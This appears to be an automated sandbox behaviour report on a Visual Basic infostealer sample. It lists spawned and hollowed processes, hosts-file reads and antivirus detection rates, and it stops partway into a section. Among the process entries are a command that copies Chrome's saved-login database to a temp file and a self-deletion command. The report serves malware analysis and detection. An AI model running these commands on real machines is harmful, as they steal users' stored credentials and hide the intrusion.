Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\subfolder1\filename1.vbs'
PE file has an executable .text section and no other executable sectionShow sources
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\subfolder1\filename1.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
Reads ini filesShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample is known by AntivirusShow sources
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeVirustotal: Detection: 26%
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeReversingLabs: Detection: 38%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeFile read: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe 'C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe'
Source: unknownProcess created: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe 'C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe'
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\subfolder1\filename1.vbs'
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\subfolder1\filename1.vbs'
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: unknownProcess created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeProcess created: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe 'C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe' Jump to behavior
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe' Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exeProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exeJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exeJump to behavior
Source: C:\Users\user\subfolder1\filename1.exeProcess created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exeJump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeProcess created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Users\user\subfolder1\filename1.exeProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\NETSTAT.EXEFile written: C:\Users\user\AppData\Roaming\O7P4TUST\O7Plogri.ini
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Binary contains paths to debug symbolsShow sources
Source: Binary string: netstat.pdbGCTL source: filename1.exe, 0000000A.00000002.890435191.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdbGCTL source: filename1.exe, 0000000C.00000003.911661147.000000000090A000.00000004.00000001.sdmp
Source: Binary string: cmmon32.pdb source: filename1.exe, 00000005.00000003.930576378.00000000008EE000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.890621224.0000000007010000.00000002.00000001.sdmp
Source: Binary string: colorcpl.pdb source: filename1.exe, 0000000C.00000003.911661147.000000000090A000.00000004.00000001.sdmp
Source: Binary string: systray.pdb source: filename1.exe, 0000001A.00000002.1279296368.00000000007FE000.00000004.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: filename1.exe, 0000001A.00000002.1279296368.00000000007FE000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: filename1.exe, 0000000A.00000002.890435191.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: filename1.exe, 00000005.00000003.930576378.00000000008EE000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: filename1.exe, 00000005.00000002.936564820.000000001F3B0000.00000040.00000001.sdmp, filename1.exe, 0000000A.00000002.901372392.000000001F4BF000.00000040.00000001.sdmp, filename1.exe, 0000000C.00000002.923689704.000000001F4E0000.00000040.00000001.sdmp, filename1.exe, 0000001A.00000002.1283486170.000000001F60F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: filename1.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.890621224.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex